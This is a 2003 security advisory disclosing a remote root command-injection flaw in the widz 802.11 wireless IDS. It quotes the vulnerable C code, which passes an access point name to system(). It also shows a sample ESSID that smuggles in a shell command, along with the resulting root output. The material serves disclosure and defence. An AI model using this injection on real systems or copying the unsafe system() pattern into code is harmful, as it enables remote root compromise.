SRT2003-08-22-104 - Wireless Intrusion dection remote root compromise

[KF <dotslash () snosoft com>]

http://www.secnetops.biz/products/
http://www.secnetops.biz/research/

Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research () secnetops com
Team Lead Contact                                 kf () secnetops com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-08-22-104
Product                 : widz (802.11 wireless IDS)
Version                 : <= v1.5
Vendor                  : http://www.loud-fat-bloke.co.uk/w80211.html
Class                   : remote
Criticality             : High
Operating System(s)     : *nix


High Level Explanation
************************************************************************
High Level Description  : widz make use of untrusted input with system()
What to do              : do not use widz in a production environment

Technical Details
************************************************************************
Proof Of Concept Status : SNO has PoC code for this issue
Low Level Description   : 

WIDZ, "the first OpenSource wireless IDS" has the ability to Detects Rogue 
APs and Monkey-jacks. Null probes , floods, and it has a Mac Backlist and 
ESSID blacklist so you can catch the obvious badguys.

from the file READMEwidz.txt we learn the following about widz_apmon.c

This sad little program monitors an area for Access Points
If finds an ap it compares it to a list of Authorised APs in a config file
if the AP isnt in list it calls a program called Alert with an appropriate 
message.

If you give widz_apmon a little test drive you will get the following. 

snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55
...

I wonder how that alert gets generated...

File: widz_apmon.c
do_alert(char *target)
  {
  char mess[100];
  if ( DEBUG )
    printf("Alert unknown AP %s\n", target);
  sprintf(mess,"Alert 'unknown AP %s\n'", target);
  system(mess);
  // Should do a check to see if we've alerted already but !!!
  }

Hrmm thats no good... but fun to play with non the less.

Go to apple airport and set network name to ';/usr/bin/id; 
(hint: use HostAP instead)

snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file

At this point the attacker can pretty much do what they wish. As a side note this is 
not the only WIDZ program to make use of system() in this manor. 


Patch or Workaround     : update will be in final version of widz

Vendor Status           : fix available "in the next couple of weeks" as of 07/26/03

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research () secnetops com for information on how
to obtain exploit information.